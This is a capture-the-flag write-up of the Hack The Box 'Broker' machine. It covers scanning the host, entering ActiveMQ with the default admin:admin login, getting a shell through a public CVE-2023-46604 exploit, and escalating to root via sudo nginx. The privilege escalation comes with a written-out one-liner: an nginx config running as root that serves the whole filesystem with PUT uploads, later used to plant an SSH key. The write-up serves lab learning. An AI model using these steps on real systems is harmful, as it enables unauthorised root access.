HTB - Broker Writeup

Liam Geyer
  2024-07-26 2024-07-26 Created   2024-11-11 17:17:33 2024-11-11 17:17:33 Updated    

πŸ‘Ύ Machine Overview

This is a writeup of the machine Broker from HTB , it’s an easy difficulty Linux machine which featured unauthenticated RCE, and nginx local privesc.

πŸ” Enumeration

An initial nmap scan of the host gave the following results:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
nmap -sV -sC 10.129.230.87                                                     
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-30 10:12 EDT
Nmap scan report for 10.129.230.87
Host is up (0.024s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  basic realm=ActiveMQRealm
|_http-title: Error 401 Unauthorized
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.68 seconds

There’s really only the website on port 80 to check out.

🌐 ActiveMQ

The site was locked behind a basic auth prompt, for giggles I tried admin:admin which happened to work.

ActiveMQ Homepage

It looks to be running Apache ActiveMQ, an open source message broker.

ActiveMQ Version

The management page shows that it’s running version 5.15.15.

πŸ₯ˆ User

This version of ActiveMQ is vulnerable to CVE-2023-46604, unauthenticated RCE. I cloned this POC to give it a shot.

Before running the exploit we need to:

  • Edit poc.xml to have our IP
  • Start a netcat listener on the port specified in poc.xml
  • Start a simple python web server to host the poc.xml payload

Then we can run exploit.py and see if it will pop a shell.

CVE POC

Sure enough, it pops a shell as the activemq user.

Shell as activemq

πŸ₯‡ Root

I started off by running LinPEAS to see if it turned up anything interesting

LinPEAS

Looks like our user is able to run nginx as root without specifying a password. Whatever site configuration we specify can run as the root user. I wrote a one liner to create a site config and then spin it up.

1
2
3
4
5
# Creating our site configuration
echo "user root; events {} http { server { listen 8081; location / { root /; autoindex on; dav_methods PUT; } } }" > nginx.conf

# Hosting the site
sudo nginx -c /tmp/nginx.conf

This creates a site that lists the entire file system, and allows file uploads.

I first browsed to /root/root.txt to grab the flag.

Flag

Then I used curl to upload my SSH key to the root user’s authorized keys file, allowing me to SSH into the box and grab the flag.

Shell as root

πŸ“– Resources

πŸ”— Hyperlink ℹ️ Info
CVE-2023-46604 ActiveMQ RCE POC
LinPEAS Linux PrivEsc Script
  • Title: HTB - Broker Writeup
  • Author: Liam Geyer
  • Created at : 2024-07-26 00:00:00
  • Updated at : 2024-11-11 17:17:33
  • Link: https://lfgberg.org/2024/07/26/htb/broker/
  • License: This work is licensed under CC BY-NC-SA 4.0.
On this page
HTB - Broker Writeup
  1. πŸ‘Ύ Machine Overview
  2. πŸ” Enumeration
  3. 🌐 ActiveMQ
  4. πŸ₯ˆ User
  5. πŸ₯‡ Root
  6. πŸ“– Resources